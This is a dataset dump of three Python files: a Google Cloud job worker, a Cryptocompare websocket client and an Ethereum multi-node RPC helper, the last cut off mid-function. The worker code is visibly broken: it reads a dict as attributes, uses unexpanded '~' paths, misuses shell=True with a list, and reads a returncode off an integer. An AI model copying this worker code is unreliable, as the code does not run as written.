source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
worker.py
|
from google.cloud import firestore
from google.cloud import storage
import json
import os
from queue import Queue, Empty
import requests
from threading import Thread
import time
import subprocess
try:
config = json.load(open('../config.json'))
except:
config = json.load(open('config.json'))
try:
redis_config = json.load(open('../jobServer/config.json'))
except:
redis_config = json.load(open('jobServer/config.json'))
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
def call_subprocess(args, stdout_writer, stdout_reader, stderr_writer, stderr_reader, env, shell):
process = subprocess.Popen(args, stdout=stdout_writer, stderr=stderr_writer, env=env, shell=shell)
if stdout_reader is None:
stdout_reader = process.stdout
if stderr_writer is not None and stderr_reader is None:
stderr_reader = process.stderr
queue = Queue()
t = Thread(target=enqueue_output, args=(stdout_reader, queue))
t.daemon = True # thread dies with the program
t.start()
t = Thread(target=enqueue_output, args=(stderr_reader, queue))
t.daemon = True # thread dies with the program
t.start()
while process.poll() is None or not queue.empty():
try:
print(str(queue.get(timeout=0.1), 'utf-8'), end='')
except Empty:
pass
return process
def subprocess_live_output(args, env=None, use_shell=False,
stdout_path=None, stderr_path=None, include_stderr=True):
stdout_writer = stdout_reader = stderr_writer = stderr_reader = None
if stdout_path is not None:
stdout_writer = open(stdout_path, 'wb')
stdout_reader = open(stdout_path, 'rb', 1)
if include_stderr:
if stdout_path is not None:
stderr_writer = subprocess.STDOUT
stderr_reader = subprocess.STDOUT
else:
stderr_writer = open(stderr_path, 'wb')
stderr_reader = open(stderr_path, 'rb', 1)
else:
stderr_writer = None
stderr_reader = None
else:
stdout_writer = subprocess.PIPE
stdout_reader = None
if include_stderr:
stderr_writer = subprocess.PIPE
stdout_reader = None
else:
stderr_writer = None
stderr_reader = None
try:
process = call_subprocess(args, stdout_writer, stdout_reader, stderr_writer, stderr_reader, env, use_shell)
finally: # make sure that files are properly closed
if stdout_path is not None:
if stdout_writer is not None:
stdout_writer.close()
if stdout_reader is not None:
stdout_reader.close()
if stdout_path is not None:
if stderr_writer is not None:
stderr_writer.close()
if stderr_reader is not None:
stderr_reader.close()
process.poll()
return process
def run_python_script(main_module, code_location, arguments=[], packages=[], env=None,
use_shell=[False, False], see_output=[False, False],
use_files=[False, False], concurrent_callback=[None, None]):
package_process = None
if len(packages) > 0:
args = ['python', '-m', 'pip', 'install', '--upgrade',
'--ignore-installed', '--target', '~/packages'] + packages
if use_files[0]:
stdout = "~/package_install.stdout"
stderr = "~/package_install.stderr"
else:
stdout = None
stderr = None
if see_output[0]:
process = subprocess_live_output(args, env=env, use_shell=use_shell[0],
include_stderr=True,
stdout_path=stdout,
stderr_path=stderr)
else:
process = subprocess.run(args, env=env, shell=use_shell[0],
stdout=stdout, stderr=stderr)
if "PYTHONPATH" in env:
env["PYTHONPATH"] = env["PYTHONPATH"] + ':' + '~/packages'
else:
env["PYTHONPATH"] = '~/packages'
package_process = process.returncode
if package_process is not None and package_process != 0:
return package_process, None
python_call = ['python', '-m', main_module]
if len(arguments) > 0: python_call += arguments
if "PYTHONPATH" in env:
env["PYTHONPATH"] = code_location + ':' + env["PYTHONPATH"]
else:
env["PYTHONPATH"] = code_location
if use_files[1]:
stdout = "~/python_run.stdout"
stderr = "~/python_run.stderr"
else:
stdout = None
stderr = None
if see_output[1]:
process = subprocess_live_output(python_call, env=env, use_shell=use_shell[1],
include_stderr=True,
stdout_path=stdout,
stderr_path=stderr)
else:
process = subprocess.run(python_call, env=env, shell=use_shell[1],
stdout=stdout, stderr=stderr)
return package_process, process.returncode
def check_message(message, job_ref):
# return job_ref.get(u'state') != u'RUNNING'
return True
def create_job(message, job_ref):
job_ref.update({u'state': u'RUNNING'})
with open('~/job_id', 'w') as file:
file.write(message['id'])
def run_job(message, job_ref):
arguments = job_ref.get(u'arguments')
module = job_ref.get(u'python_module')
code_path = job_ref.get(u'cloud_storage_path')
packages = job_ref.get(u'pip_packages')
output_dir = '~/code/code.tar.gz'
subprocess.run(['mkdir', '~/code', ';',
'gsutil', 'cp', code_path, output_dir, ';',
'tar', '-xf', '~/code/code.tar.gz', '-C', '~/code'],
shell=True)
class ACKDEADLINE_EXTEND():
def __init__(self, message, ack_deadline=config.ack_deadline, ack_min=config.ack_min):
self.first_call = True
self.message = message
self.ack_deadline = ack_deadline
self.ack_min = ack_min
self.message.modify_ack_deadline(self.ack_deadline)
self.get_time = lambda: time.time()
self.start_time = self.get_time()
def __call__(self):
current_time = self.get_time()
if current_time - self.start_time < self.ack_min:
self.start_time = current_time
self.message.modify_ack_deadline(self.ack_deadline)
process = run_python_script(module, output_dir, env=os.environ.copy(),
arguments=arguments, packages=packages,
use_files=[True, True], concurrent_callback=[None, ACKDEADLINE_EXTEND(message)])
return process[1].returncode
def teardown_job(message, job_ref):
job_ref.update({u'state': u'COMPLETED'})
os.remove('~/job_id')
requests.put('{}/job/{}/completed'.format(config['job_queue_address'], message['id']),
headers={'auth_key': redis_config['redis_auth_key']})
def handle_message(message):
db = firestore.Client()
database_job_location = message.data
job_ref = db.document(database_job_location)
if not check_message(message, job_ref):
return
create_job(message, job_ref)
run_job(message, job_ref)
teardown_job(message, job_ref)
if __name__ == '__main__':
while True:
for queue in config['worker_queues']:
response = requests.put('{}/queue/{}/pop'.format(config['job_queue_address'], queue),
headers={'auth_key': redis_config['redis_auth_key']})
job = json.loads(response.text)
handle_message(job['payload'])
time.sleep(1)
|
core.py
|
# -*- coding: utf-8 -*-
import logging
import time
from requests.exceptions import ConnectionError
from threading import Thread
import pymongo
import requests
import json
import sys
import socketIO_client
from . import masks
from . import customized_methods
from six import iteritems
from six import string_types as basestring
setattr(socketIO_client.transports.XHR_PollingTransport,
'recv_packet', customized_methods.custom_recv_packet)
class CryptocompareClient(object):
def __init__(self, sub_strings=None, websocket_url='https://streamer.cryptocompare.com',
mongo_col=None, namespace=None):
"""CryptocompareClient connects to the Websocket and Rest APIs of Cryptocompare.
Args:
sub_strings (optional): Websocket subscriptions, defaults to None.
The strings must have the format
'{SubscriptionId}~{ExchangeName}~{FromSymbol}~{ToSymbol}'
sub_strings must either be a list of strings or a single strings
websocket_url (optional): The url used to connect to the websocket.
Defaults to 'https://streamer.cryptocompare.com'
mongo_col (optional): MongoDB (pymongo) collection to insert messages into.
Defaults to None
namespace (optional): socketIO Namespace used to handle events.
Defaults to None.
"""
# define initial btc and eth prices
self.btc = 0
self.eth = 0
if isinstance(sub_strings, basestring):
sub_strings = [sub_strings]
if isinstance(sub_strings, list):
self.sub_strings = sub_strings[:]
else:
self.sub_strings = sub_strings
self.url = websocket_url
self.mongo_col = mongo_col
self.namespace = namespace
self.restart_after = None
self._init_websocket()
def _init_websocket(self):
if self.namespace is None:
self.socket = socketIO_client.SocketIO(self.url)
else:
self.socket = socketIO_client.SocketIO(self.url, Namespace=self.namespace)
self.socket.on('m', self._on_message)
if self.sub_strings is not None:
self.subscribe(sub_strings=self.sub_strings[:])
def restart(self):
"""Restart websocket"""
logging.info("Restarting Cryptocompare Client...")
self.stop()
if hasattr(self, "thread"):
self.thread.join()
self._init_websocket()
self.listen(self.seconds, self.restart_after)
def listen(self, seconds=None, restart_after=None):
"""Start listening to the websocket.
Args:
seconds: Number of seconds to listen. Defaults to None.
If not specified, client will listen forever.
restart_after: Number of seconds to wait until restart,
when no messages are received. If not specified,
client will not restart.
"""
self.seconds = seconds
self.restart_after = restart_after
self.start_time = time.time()
self.received_messages = []
if restart_after is None:
if self.seconds is not None:
self.socket.wait(seconds=seconds)
else:
self.socket.wait()
else:
def _wait_thread():
if self.seconds is not None:
self.socket.wait(seconds=seconds)
else:
self.socket.wait()
self.thread = Thread(target=_wait_thread)
self.thread.start()
try:
if restart_after is not None:
time.sleep(restart_after)
while True:
n_messages = len(filter(lambda message_time:
time.time()-message_time < restart_after,
self.received_messages))
logging.debug("Number of messages in last %s seconds: %s",
restart_after, n_messages)
if restart_after is not None:
if n_messages == 0:
self.restart()
break
time.sleep(1)
except KeyboardInterrupt:
logging.debug("KeyboardInterrupt: Stopping...")
self.stop()
self.thread.join()
def stop(self):
"""Disconnect websocket"""
self.socket.disconnect()
def get_coin_list(self, base_url='https://www.cryptocompare.com/api/data/'):
"""Return coin list, see https://www.cryptocompare.com/api/#-api-data-coinlist-"""
r = requests.get('{}coinlist/'.format(base_url))
if r.status_code == 200:
return r.json()
else:
return r.status_code
def get_coin_snapshot(self, fsym, tsym, base_url='https://www.cryptocompare.com/api/data/'):
"""Return coin snapshot, see https://www.cryptocompare.com/api/#-api-data-coinsnapshot-"""
r = requests.get('{}coinsnapshot/?fsym={}&tsym={}'.format(base_url,fsym,tsym))
if r.status_code == 200:
return r.json()
else:
return r.status_code
def get_top_pairs(self, fsym, limit=2000, base_url='https://min-api.cryptocompare.com/data/'):
"""Return top currency pairs by volume, see https://www.cryptocompare.com/api/#-api-data-toppairs-"""
r = requests.get('{}top/pairs?fsym={}&limit={}'.format(base_url, fsym, limit))
if r.status_code == 200:
return r.json()
else:
return r.status_code
def get_all_coins(self, base_url='https://www.cryptocompare.com/api/data/'):
"""Return a list of all coins that are available on CryptoCompare"""
coin_list = self.get_coin_list(base_url=base_url)
return [coin for coin,d in iteritems(coin_list['Data'])]
def get_all_exchanges(self, fsym, tsym, base_url='https://www.cryptocompare.com/api/data/'):
"""Return a list of all exchanges that trade a currency pair"""
res = self.get_coin_snapshot(fsym, tsym, base_url=base_url)
try:
exchanges = res['Data']['Exchanges']
markets = [x['MARKET'] for x in exchanges]
return sorted(markets)
except KeyError:
return res
def query_rest_api(self, api_name, base_url='https://min-api.cryptocompare.com/data/', **params):
"""Query the Rest API with specified params"""
query_params = '&'.join(['{}={}'.format(k,v) for k,v in iteritems(params)])
query_string = base_url + api_name + '?' + query_params
r = requests.get(query_string)
if r.status_code == 200:
return r.json()
else:
return r.status_code
def subscribe(self, method=None, exchange=None, currency_pair=None, sub_strings=None):
"""Subscribe to websocket channels
The channels must either be specified by the parameter sub_strings or by a combination
of the parameters method, exchange and currency_pair.
Args:
method (optional): The method must either be 'TRADE', 'CURRENT', 'CURRENTAGG' or
one of the corresponding SubsciptionIDs (0, 2 or 5).
See https://www.cryptocompare.com/api/#-api-web-socket-subscribe- for more
information.
exchange (optional): A valid exchange name that is recognized by the cryptocompare API.
currency_pair (optional): A tuple of currency symbols that are recognized by the
cryptocompare API, such as ('BTC','USD')
sub_strings (optional): Subscription strings in the format
'{SubscriptionId}~{ExchangeName}~{FromSymbol}~{ToSymbol}'.
sub_strings must either be a list of strings or a single string-
"""
if method is None and exchange is None and currency_pair is None and sub_strings is None:
raise ValueError("Either sub_strings or method, exchange, and currency_pair must be specified.")
elif sub_strings is not None:
if method is not None or exchange is not None or currency_pair is not None:
raise ValueError("If sub_strings is specified, all other keyword arguments must be None.")
if isinstance(sub_strings, basestring):
sub_strings = [sub_strings]
elif method is None or exchange is None or currency_pair is None:
raise ValueError("If sub_strings is None, all other keyword arguments must be specified.")
else:
method = self._convert_method_to_number(method)
sub_strings = ['{}~{}~{}~{}'.format(method,
exchange,
currency_pair[0],
currency_pair[1])]
if self.sub_strings is None:
self.sub_strings = []
self.sub_strings.extend(sub_strings)
self.sub_strings = list(set(self.sub_strings))
try:
self.socket.emit('SubAdd', { 'subs': sub_strings })
except ConnectionError as e:
logging.info("ConnectionError: %s", e)
self.restart()
def unsubscribe(self, method=None, exchange=None, currency_pair=None, sub_strings=None):
"""Unubscribe from websocket channels
The channels must either be specified by the parameter sub_strings or by a combination
of the parameters method, exchange and currency_pair.
Args:
method (optional): The method must either be 'TRADE', 'CURRENT', 'CURRENTAGG' or
one of the corresponding SubsciptionIDs (0, 2 or 5).
See https://www.cryptocompare.com/api/#-api-web-socket-subscribe- for more
information.
exchange (optional): A valid exchange name that is recognized by the cryptocompare API.
currency_pair (optional): A tuple of currency symbols that are recognized by the
cryptocompare API, such as ('BTC','USD')
sub_strings (optional): Subscription strings in the format
'{SubscriptionId}~{ExchangeName}~{FromSymbol}~{ToSymbol}'.
sub_strings must either be a list of strings or a single string-
"""
if sub_strings is not None:
if isinstance(sub_strings, basestring):
sub_strings = [sub_strings]
self.socket.emit('SubRemove', { 'subs': sub_strings })
else:
method = self._convert_method_to_number(method)
sub_strings = ['{}~{}~{}~{}'.format(method,
exchange,
currency_pair[0],
currency_pair[1])]
self.socket.emit('SubRemove', { 'subs': sub_strings })
def unsubscribe_all(self):
"""Unsubscribe from all channels that have been subscribed"""
self.socket.emit('SubRemove', { 'subs': self.sub_strings })
def _convert_method_to_number(self, method):
"""Convert method name to corresponding SubscriptionId"""
if str(method).upper() not in ['0', '2', '5', 'TRADE', 'CURRENT', 'CURRENTAGG']:
raise ValueError('Method has invalid value: {}'.format(method))
if str(method).upper() == 'TRADE' :
method = '0'
elif str(method).upper() == 'CURRENT':
method = '2'
elif str(method).upper() == 'CURRENTAGG':
method = '5'
return method
def _parse_message(self, response):
"""Parse a message received through websocket and return dictionary
Args:
response (str): The raw message
"""
response_list = response.split('~')
sub_id = response_list[0]
try:
if sub_id == '0': # TRADE
keys = ['SubscriptionId','ExchangeName','Symbol','CurrencySymbol','Flag','TradeId','TimeStamp','Quantity','Price','Total']
res = dict(zip(keys, response_list))
elif sub_id == '2' or sub_id == '5': # CURRENT / CURRENTAGG
unpacked = {}
mask = int(response_list[-1], 16)
i = 0
for key,value in masks.current:
if value == 0 or mask & value:
unpacked[key] = response_list[i]
i += 1
res = unpacked
else:
logging.debug("Unknown sub_id in message: %s", response)
res = None
except:
logging.warning("Parsing failed for: %s", response)
res = None
return res
def _on_message(self, *args):
"""Handle received messages and write to MongoDB if mongo_col was specified"""
parsed_message = self._parse_message(args[0])
if parsed_message is None:
logging.debug(("Could not parse message: %s", args[0]))
return
logging.debug("Received message: %s", parsed_message)
parsed_message = self.process_message(parsed_message)
if self.mongo_col is not None:
self.mongo_col.insert_one(parsed_message)
def process_message(self, msg):
"""Override this method to alter or handle incoming messages"""
if self.mongo_col is None:
print(msg)
return msg
|
core.py
|
import copy
import json
import threading
import time
import traceback
from random import randint
from threading import Lock
import requests
import rlp
from ethereum import transactions
from web3 import Web3
RequestTimeout_seconds = 6
LengthOfDataProperty = 64
LengthOfPrivateKey = 64
LengthOfPublicAddress_Including0x = 42
LengthOfPublicAddress_Excludes0x = 40
LengthOfTransactionHash_Including0x = 66
LengthOfTransactionHash_Excludes0x = 64
Headers = {'content-type': 'application/json'}
RequestTimeout_seconds = 5
def ConvertIntToHex(number_int):
return "%x" % int(number_int)
def MergeDictionaries(x, y):
z = x.copy() # start with x's keys and values
z.update(y) # modifies z with y's keys and values & returns None
return z
def SendRequestToAllNodes(payload, headers, requestTimeout_seconds, resultHandlerDelegate=None,
doSetBlockNumber_BasedOnLatestBlockNumber_int=True,
requiredToWaitForAllNodesResponsesBeforeYouConsiderResults=False,
payloadIsBatched=False, doRejectBatchedPayloadIfAnyOneHasError=True, specifiedBlockNumber_int=None):
from Libraries.nodes import RemoteNodeList
return SendRequestToSpecifiedNodes(RemoteNodeList, payload, headers, requestTimeout_seconds, resultHandlerDelegate,
doSetBlockNumber_BasedOnLatestBlockNumber_int,
requiredToWaitForAllNodesResponsesBeforeYouConsiderResults,
payloadIsBatched, doRejectBatchedPayloadIfAnyOneHasError, specifiedBlockNumber_int)
def SendRequestToSpecifiedNodes(remoteNodeList_toUse, payload, headers, requestTimeout_seconds, resultHandlerDelegate=None,
doSetBlockNumber_BasedOnLatestBlockNumber_int=True,
requiredToWaitForAllNodesResponsesBeforeYouConsiderResults=False,
payloadIsBatched=False, doRejectBatchedPayloadIfAnyOneHasError=True, specifiedBlockNumber_int=None):
global LatestBlockNumber_int
if doSetBlockNumber_BasedOnLatestBlockNumber_int and specifiedBlockNumber_int:
print("Setting both of these is not valid. Only one can be set: doSetBlockNumber_BasedOnLatestBlockNumber_int "
"and specifiedBlockNumber_int. Overriding doSetBlockNumber_BasedOnLatestBlockNumber_int to False.")
doSetBlockNumber_BasedOnLatestBlockNumber_int = False
numOfBatchedRequests = 0
if payloadIsBatched:
numOfBatchedRequests = len(payload)
# print("SendRequestToSpecifiedNodes: numOfBatchedRequests = " + str(numOfBatchedRequests))
threads = []
resultDict = {}
lock_resultDict = Lock()
numOfExpectedResults = len(remoteNodeList_toUse)
for remoteNode in remoteNodeList_toUse:
# Reverse the order, instead of going for 0, 1, 2, 3... Go 3, 2, 1, 0
resultKey = str(remoteNode.name)
blockNumber_toUse = None
# Execute the call with this blockNumber_toUse
# print("SendRequestToSpecifiedNodes: node = " + str(remoteNode.name) + ", payload = " + str(payload))
t = threading.Thread(target=SubmitRequest, args=(Get_RemoteEthereumNodeToUse(remoteNode), payload, payloadIsBatched, headers, requestTimeout_seconds,
blockNumber_toUse, resultDict, resultKey, lock_resultDict,))
t.start()
threads.append(t)
# TODO, Instead of doing a .join and waiting for all to finish.
# Some may timeout, so I want to proceed as soon as at least one valid response comes in.
# Don't wait for many valid responses or else i'll lag everything
# for thread in threads:
# thread.join()
elapsedTime_ms = 0
timeout_ms = requestTimeout_seconds * 1000
# Keep this low, as long as we don't have a million print/log statements. The more print/log statements the more it will slow everything down
sleepTime_ms = 5
sleepTime_s = sleepTime_ms / 1000
foundValidRecentResponse = False
currentResultDictLength = 0
previousResultDictLength = 0
while elapsedTime_ms < timeout_ms:
# Create a copy so it's threadsafe, we need to do this because new data could come in at any moment since i'm making so many requests
lock_resultDict.acquire()
try:
resultDict_copy = copy.deepcopy(resultDict)
finally:
lock_resultDict.release()
currentResultDictLength = len(resultDict_copy)
# print("resultDict_copy, waiting for responses. We have " + str(currentResultDictLength) + " of " + str(numOfExpectedResults) + " = " + str(resultDict_copy))
if currentResultDictLength == numOfExpectedResults:
# print("Received all responses, breaking from loop")
break
# Consider breaking if i've found a result that satisfies me.
# Tricky thing is, some calls will want to wait for all results to come in before it analyzes results and some calls are willing to go with the first good looking result.
# So check the requiredToWaitForAllNodesResponsesBeforeYouConsiderResults flag
elif not requiredToWaitForAllNodesResponsesBeforeYouConsiderResults:
if currentResultDictLength > 0:
# if not resultHandlerDelegate and currentResultDictLength > 0:
# print("currentResultDictLength = " + str(currentResultDictLength) + ", previousResultDictLength = " + str(previousResultDictLength))
# Only call DetermineMostRecentValidResponseFromResultDict when we have new data
if currentResultDictLength == previousResultDictLength:
# print("Not calling DetermineMostRecentValidResponseFromResultDict because we don't have any new data since last time through the loop")
pass
else:
# Set the previous now that we have new data
previousResultDictLength = currentResultDictLength
# print("Calling DetermineMostRecentValidResponseFromResultDict because we have have new data since last time through the loop")
# print("We haven't yet received all responses but let's check to see if the responses we received are valid enough")
# Call DetermineMostRecentValidResponseFromResultDict but do not yet raise an exception if it's not valid because we're still waiting for some API calls to return
if DetermineMostRecentValidResponseFromResultDict(resultDict_copy, remoteNodeList_toUse,
doSetBlockNumber_BasedOnLatestBlockNumber_int,
payloadIsBatched, numOfBatchedRequests, doRejectBatchedPayloadIfAnyOneHasError,
False):
# print("We found a valid recent response! Breaking despite not yet receiving all responses")
foundValidRecentResponse = True
break
time.sleep(sleepTime_s)
elapsedTime_ms += sleepTime_ms
# if not foundValidRecentResponse and currentResultDictLength != numOfExpectedResults:
# print("Timed out before we received all responses")
# Create a copy so it's threadsafe, we need to do this because new data could come in at any moment since i'm making so many requests
lock_resultDict.acquire()
try:
resultDict_copy = copy.deepcopy(resultDict)
finally:
lock_resultDict.release()
firstNcharacters = 500
# This print statement will show me which nodes got success responses and which got timeouts or known errors we're catching
if not payloadIsBatched:
print("SendRequestToSpecifiedNodes: resultDict for " + str(payload['method']) + " = " + str(resultDict_copy))
# # This below loop with print statements will show me the content in each response for each node
# for resultKey in resultDict_copy:
# if hasattr(resultDict_copy[resultKey], 'content'):
# print("SendRequestToSpecifiedNodes: resultDict w/ content = " + str(resultDict_copy[resultKey].content)[0:firstNcharacters] + "...")
# else:
# print("SendRequestToSpecifiedNodes: resultDict w/ string value = " + str(resultDict_copy[resultKey])[0:firstNcharacters] + "...")
else:
listOfMethods = []
for batchedPayload in payload:
listOfMethods.append(batchedPayload['method'])
print("SendRequestToSpecifiedNodes: resultDict for " + str(listOfMethods) + " = " + str(resultDict_copy))
# # This below loop with print statements will show me the content in each response for each node
# for resultKey in resultDict_copy:
# if hasattr(resultDict_copy[resultKey], 'content'):
# print("SendRequestToSpecifiedNodes: resultDict w/ content = " + str(resultDict_copy[resultKey].content)[0:firstNcharacters] + "...")
# else:
# print("SendRequestToSpecifiedNodes: resultDict w/ string value = " + str(resultDict_copy[resultKey])[0:firstNcharacters] + "...")
if resultHandlerDelegate:
# print("SendRequestToSpecifiedNodes: calling resultHandlerDelegate")
return resultHandlerDelegate(resultDict_copy)
else:
# Create a copy so it's threadsafe, we need to do this because new data could come in at any moment since i'm making so many requests
lock_resultDict.acquire()
try:
resultDict_copy = copy.deepcopy(resultDict)
finally:
lock_resultDict.release()
# print("SendRequestToSpecifiedNodes: returning DetermineMostRecentValidResponseFromResultDict")
return DetermineMostRecentValidResponseFromResultDict(resultDict_copy, remoteNodeList_toUse,
doSetBlockNumber_BasedOnLatestBlockNumber_int,
payloadIsBatched, numOfBatchedRequests, doRejectBatchedPayloadIfAnyOneHasError)
def DetermineMostRecentValidResponseFromResultDict(resultDict, remoteNodeList,
doSetBlockNumber_BasedOnLatestBlockNumber_int,
payloadIsBatched, numOfBatchedRequests, doRejectBatchedPayloadIfAnyOneHasError,
doRaiseExceptionIfNotValid=True):
# So here the resultDict contains a bunch of results. Some are valid and some are not. Of the valid ones, some are for different block numbers.
# Find the most recent valid one
doPrintDebug = False
# If we have many batched responses per node call
if payloadIsBatched:
mostRecentValidResponse = None
resultKeyForMostRecentValidResponse = None
for resultKey in resultDict:
resultString = None
if not hasattr(resultDict[resultKey], 'content'):
resultString = "ERROR, Could not parse response into JSON"
else:
responseData = resultDict[resultKey].content
jData = json.loads(responseData)
# Count how many times a response failed
count_failed = 0
# Increment the fails for each time a response didn't come in per a request
numOfBatchedResponses = len(jData)
count_failed += numOfBatchedRequests - numOfBatchedResponses
for batchedJData in jData:
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: Found result batchedJData: " + str(batchedJData))
if 'error' in batchedJData:
resultString = str(batchedJData['error'])
count_failed += 1
elif 'result' in batchedJData and batchedJData['result'] and str(batchedJData['result']).lower() != "null" and str(
batchedJData['result']).lower() != "0x":
resultString = str(batchedJData['result'])
else:
resultString = "ERROR, Could not find result in response"
count_failed += 1
# Once it's all done iterating over the batched responses, if count_failed is still zero
if count_failed == 0 or not doRejectBatchedPayloadIfAnyOneHasError:
# Then assume we have good data
mostRecentValidResponse = resultDict[resultKey]
resultKeyForMostRecentValidResponse = resultKey
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: numOfBatchedRequests = " + str(numOfBatchedRequests) + ", numOfBatchedResponses = " + str(
numOfBatchedResponses) + ", count_failed = " + str(count_failed) + " after iterating over all batched responses")
print("DetermineMostRecentValidResponseFromResultDict: Found result: " + str(resultString))
if mostRecentValidResponse:
return mostRecentValidResponse
else:
# I cannot return anything since this is not a valid response
return None
# Else we have only one response to deal with per node call
else:
mostRecentValidResponse = None
highestBlockNumber = 0
resultKeyForMostRecentValidResponse = None
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: resultDict = " + str(resultDict))
print("DetermineMostRecentValidResponseFromResultDict: remoteNodeList = " + str(remoteNodeList))
for resultKey in resultDict:
resultString = None
if not hasattr(resultDict[resultKey], 'content'):
resultString = "ERROR, Could not parse response into JSON"
else:
responseData = resultDict[resultKey].content
jData = json.loads(responseData)
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: Found result jData: " + str(jData))
if 'error' in jData:
resultString = str(jData['error'])
elif 'result' in jData and jData['result'] and str(jData['result']).lower() != "null" and str(jData['result']).lower() != "0x":
resultString = str(jData['result'])
# If we're making the call based on a specific block number then I should verify the block number before I say it's valid
if doSetBlockNumber_BasedOnLatestBlockNumber_int:
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: Analyzing mostRecentValidResponse = " + str(
mostRecentValidResponse) + ", highestBlockNumber = " + str(highestBlockNumber) + ", resultKey = " + str(resultKey))
# Verify the block number before I assume it's valid
if not mostRecentValidResponse:
mostRecentValidResponse = resultDict[resultKey]
resultKeyForMostRecentValidResponse = resultKey
# Else we're making the call based on the 'latest' instead of a specific block number
else:
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: Analyzing mostRecentValidResponse = " + str(
mostRecentValidResponse) + ", highestBlockNumber = " + str(highestBlockNumber) + ", resultKey = " + str(resultKey))
mostRecentValidResponse = resultDict[resultKey]
highestBlockNumber = None
resultKeyForMostRecentValidResponse = resultKey
else:
resultString = "ERROR, Could not find result in response"
if doPrintDebug:
print("DetermineMostRecentValidResponseFromResultDict: Found result: " + str(resultString))
if mostRecentValidResponse:
# We're making the call based on the 'latest' instead of a specific block number
return mostRecentValidResponse
else:
if doRaiseExceptionIfNotValid:
message = "DetermineMostRecentValidResponseFromResultDict: Did not find a valid response in SendRequestToSpecifiedNodes out of " + str(
len(remoteNodeList)) + " nodes"
raise Exception(message)
def RemovePropertyFromPayloadParams(property, payload):
if property in payload['params']:
payload['params'].remove(property)
def SubmitRequest(url, payload, payloadIsBatched, headers, requestTimeout_seconds, blockNumber_toUse, resultDict, resultKey, lock_resultDict=None):
# Make a copy of the payload object and modify the copy
payload_copyToUse = copy.deepcopy(payload)
if not payloadIsBatched:
# Set the id if it's not already set
if 'id' not in payload_copyToUse:
# Set the id to the payload_copyToUse
payload_copyToUse['id'] = (randint(0, 999999999999999))
# Clear these block number properties. Make sure block properties like 'latest', 'pending', etc are not in the params
RemovePropertyFromPayloadParams('latest', payload_copyToUse)
RemovePropertyFromPayloadParams('pending', payload_copyToUse)
RemovePropertyFromPayloadParams('earliest', payload_copyToUse)
else:
for batchedPayload in payload_copyToUse:
# print("SubmitRequest: batchedPayload before setting id = " + str(batchedPayload))
# Set the id if it's not already set
if 'id' not in batchedPayload:
# Set the id to the payload_copyToUse
batchedPayload['id'] = (randint(0, 999999999999999))
# print("SubmitRequest: batchedPayload after setting id = " + str(batchedPayload))
# Clear these block number properties. Make sure block properties like 'latest', 'pending', etc are not in the params
RemovePropertyFromPayloadParams('latest', batchedPayload)
RemovePropertyFromPayloadParams('pending', batchedPayload)
RemovePropertyFromPayloadParams('earliest', batchedPayload)
blockNumberParamIsRequired = True
if not payloadIsBatched:
method = payload_copyToUse['method']
if not RpcMethodRequiresBlockNumberSpecification(method):
# print("SubmitRequest: not specifying block number for this call because it will throw an error if we do")
blockNumberParamIsRequired = False
else:
for batchedPayload in payload_copyToUse:
method = batchedPayload['method']
# If anyone one of these methods in this batched call behave this way, treat the entire thing this way
if not RpcMethodRequiresBlockNumberSpecification(method):
blockNumberParamIsRequired = False
break
if blockNumberParamIsRequired:
if not blockNumber_toUse:
if not payloadIsBatched:
# We're using only the latest
payload_copyToUse['params'].append('latest')
else:
for batchedPayload in payload_copyToUse:
# We're using only the latest
batchedPayload['params'].append('latest')
else:
if not payloadIsBatched:
# Append the block number to the payload_copyToUse
# print("Before payload_copyToUse = " + str(payload_copyToUse))
payload_copyToUse['params'].append(blockNumber_toUse)
# print("After payload_copyToUse = " + str(payload_copyToUse))
else:
for batchedPayload in payload_copyToUse:
# Append the block number to the batchedPayload
# print("Before batchedPayload = " + str(batchedPayload))
batchedPayload['params'].append(blockNumber_toUse)
# print("After batchedPayload = " + str(batchedPayload))
try:
# print("SubmitRequest: to " + str(url) + " with payload " + str(payload_copyToUse))
# datetimeBefore = datetime.datetime.now()
response = requests.post(url, data=json.dumps(payload_copyToUse), headers=headers, timeout=requestTimeout_seconds)
# duration_s = (datetime.datetime.now() - datetimeBefore).total_seconds()
# print("SubmitRequest: to " + str(url) + " duration_s = " + str(duration_s))
except Exception as ex:
print("exception (unknown) in SubmitRequest: ex = " + str(type(ex)) + ", stacktrace = " + str(traceback.format_exc()))
# # Do not print the stacktrace to logs or i'll get spammed and performance will suffer
response = "wtf"
pass
# response = requests.post(url, data=json.dumps(payload_copyToUse), headers=headers, timeout=requestTimeout_seconds)
# print("SubmitRequest: response = " + str(response))
# print("SubmitRequest: response.content = " + str(response.content) + ", this was for url = " + str(url))
# if there's no lock, just update the resultDict
if not lock_resultDict:
resultDict[resultKey] = response
# Else we have a lock, so let's update the resultDict in a threadsafe way
else:
lock_resultDict.acquire()
try:
resultDict[resultKey] = response
finally:
lock_resultDict.release()
def RpcMethodRequiresBlockNumberSpecification(method):
# Some RPC calls requires a block number specification (aka no block number, no "latest", etc)
if method == 'eth_blockNumber' or \
method == 'eth_estimateGas' or \
method == 'eth_getBlockTransactionCountByHash' or \
method == 'eth_sendTransaction' or \
method == 'eth_sendrawtransaction' or \
method == 'eth_estimategas' or \
method == 'eth_getBlockByHash' or \
method == 'eth_getTransactionByHash' or \
method == 'eth_getTransactionByBlockHashAndIndex' or \
method == 'eth_getTransactionReceipt' or \
method == 'eth_pendingTransactions' or \
method == 'eth_getBlockByNumber' or \
method == 'eth_pendingTransactions' or \
method == 'eth_gasPrice' or \
method == 'eth_getLogs' or \
method == 'eth_sendRawTransaction':
return False
else:
return True
def Get_RemoteEthereumNodeToUse(url_RemoteNode):
return url_RemoteNode.value
def API_GetTransactionCount(address):
payload = {
"jsonrpc": "2.0",
"method": "eth_getTransactionCount",
"params": [
address,
]
}
# print("payload = " + str(payload))
response = SendRequestToAllNodes(payload, Headers, RequestTimeout_seconds,
ResultHandlerDelegate_DetermineHighestResult_int,
True, True)
if response.ok:
responseData = response.content
jData = json.loads(responseData)
# print("API_GetTransactionCount jData = " + str(jData))
transactionCount = ConvertHexToInt(jData['result'])
return transactionCount
else:
